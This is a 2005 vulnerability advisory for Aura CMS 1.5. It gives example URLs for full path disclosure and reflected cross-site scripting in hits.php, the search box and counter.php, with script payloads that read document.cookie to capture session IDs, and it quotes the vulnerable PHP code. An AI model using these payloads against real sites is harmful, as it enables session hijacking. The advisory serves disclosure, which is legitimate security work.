Aura CMS version 1.5 is susceptible to full path disclosure and cross site scripting flaws.
22e6513e068d86c89136d785bf64b15bc83811190025db52b304037ba642137a
---------------------------------------------------------------------------
Vulnerabilities in Aura CMS
---------------------------------------------------------------------------
Author: y3dips
Date: Januari, 25th 2005
Location: Indonesia, Jakarta
Web: https://echo.or.id/adv/adv011-y3dips-2005.txt
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
auraCMS (Content Management System)
version: 1.5
date : 21 September 2004
lisensi: GPL - https://www.gnu.org/licenses/licenses.html#GPL
Author: Arif Supriyanto - arif@ayo.kliksini.com
https://www.semarang.tk
https://www.ayo.kliksini.com
https://www.auracms.opensource-indonesia.com
Description:
auraCMS is a PHP script package that you to possiblity to building
a website with dynamic content easier and faster, no waste time more.
---------------------------------------------------------------------------
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A. Full Path disclosures
==>> https://[site]/[aura]/?pilih=teman&id=34%60select%20all
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in
/home/cxxo/public_html/aura/teman.php on line 9
==>> https://[site]/[aura]/?pilih=hal&id=4%60tes
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in
/home/cxxo/public_html/aura/hal.php on line 10
==>> https://[site]/[aura]/?pilih=arsip&topik=1%60
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in
/home/cxxo/public_html/aura/arsip.php on line 11
B. Session ID
CMS with This version has two method of authentication (session and cookies) ,
this problem has found in session method .
There are so many variable that havent declared yet, it makes attacker could
exploit it by inputing some "character" n gaining an session id on windows pop up
for eXample
---- hits.php -----
<?
$perintah = "SELECT * FROM counter WHERE id=1";
$hasil = mysql_query( $perintah );
while ($data = mysql_fetch_row($hasil)) {
$hits=$data[3];
}
echo "<b>$hits</b>";
?>
-------end -------
look $hits variable , do you see something interested ? yes SIR , we've found something
lets do some try
==>> https://[site]/[aura]/hits.php?&hits=%3Cscript%3Ealert(document.cookie)%3C/script%3E
then you get the session ID
another vulnerable :
in pencarian (search) input box
+ https://[site]/[aura]/index.php?query=%3Cscript%3Ealert(document.cookie)%3C/script%3E&pilih=search
also in counter module
+ https://[site]/[aura]/counter.php?theCount=%3Cscript%3Ealert(document.cookie)%3C/script%3E
p.s : Wanna know what session IDs gives you ? try google :D
---------------------------------------------------------------------------
FIx :
founded : Januari 25th 2005
reported to vendor :Februari 15th 2005
;vendor respond but not yet releasing any patch
publish at securityfocus : March 2th 2005
---------------------------------------------------------------------------
Shoutz:
~~~~~~~
~ m0by, the_day, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous
~ newbie_hacker@yahoogroups.com ,https://forum.ehco.or.id
~ #e-c-h-o@DALNET
---------------------------------------------------------------------------
Contact:
~~~~~~~~
y3dips || echo|staff || y3dips[at]gmail[dot]com
Homepage: https://y3dips.echo.or.id/
-------------------------------- [ EOF ] ----------------------------------